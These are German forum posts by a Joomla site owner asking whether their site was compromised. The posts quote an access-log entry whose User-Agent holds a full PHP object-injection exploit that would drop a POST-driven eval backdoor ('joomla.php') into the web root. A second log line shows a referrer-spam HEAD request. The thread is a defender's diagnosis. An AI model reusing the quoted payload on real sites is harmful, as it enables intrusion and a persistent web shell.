Beiträge von joomla234566

  • Joomla Seite gehackt?

    Alles klar. Vielen Dank. Habe nochmal nachgeschaut, es gibt keine solche Datei. In meinem LogFile gibt es noch zwei Einträge ähnlicher Art, aber alle mit Statuscode 403. Somit gehe ich davon aus, dass der Angriff abgeblockt wurde. Nochmals vielen Dank für die Antwort!

  • Joomla Seite gehackt?

    Vielleicht noch eine Ergänzung: Es kommen auch immer mal wieder Anfragen von irgendwelchen russischen Seiten, die etwa so aussehen:


    anon-185-154-13-143.example.com - - [14/Jan/2017:01:36:09 +0100] "HEAD / HTTP/1.1" 200 - "http://visasuk.ru/page-57.html" "Mozilla/2.0 (compatible; MSIE3.00; Windows 2003)


    Das machen die Google Bots etc. ja auch. Also nur HTTP/1.1 anfordern. Ist das gefährlich? Kann man dagegen ggf. etwas tun?


    Danke vielmals für die Antworten.

  • Joomla Seite gehackt?

    Guten Tag,
    ich habe heute mal meine LogFiles angesehen und mir ist dabei ein auffälliger Eintrag ins Auge gefallen:


    anon-192-151-151-175.ip.invalid - - [16/Jan/2017:00:18:12 +0100] "GET / HTTP/1.1" 403 202 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:238:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"joomla.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9"


    Der Eintrag ist wie zu sehen vom 16. Januar 2017. Das Sicherheitsupdate von Joomla (3.6.5) habe ich mit ziemlich großer Sicherheit im Dezember eingespielt. Es ging bei den vorherigen Versionen ja gerade um solche Einträge.


    Nun meine Frage: War dieser Eintrag/Angriff erfolgreich? Ich habe bereits alle Passwörter sicherheitshalber geändert. Mir fallen aber auch keine auffälligen Änderungen an Dateien, etc. auf. Der potentielle Angriff liegt dann ja auch bereits etwa einen Monat zurück. Ich bitte um Hilfe, da ich selbst nicht genau weiß, wie ich weiter verfahren soll. Sollte es sich tatsächlich um einen erfolgreichen Angriff handeln, weiß ich nicht, wo die Sicherheitslücke sein soll…


    Irgendwelche auffälligen Benutzer konnte ich nicht finden.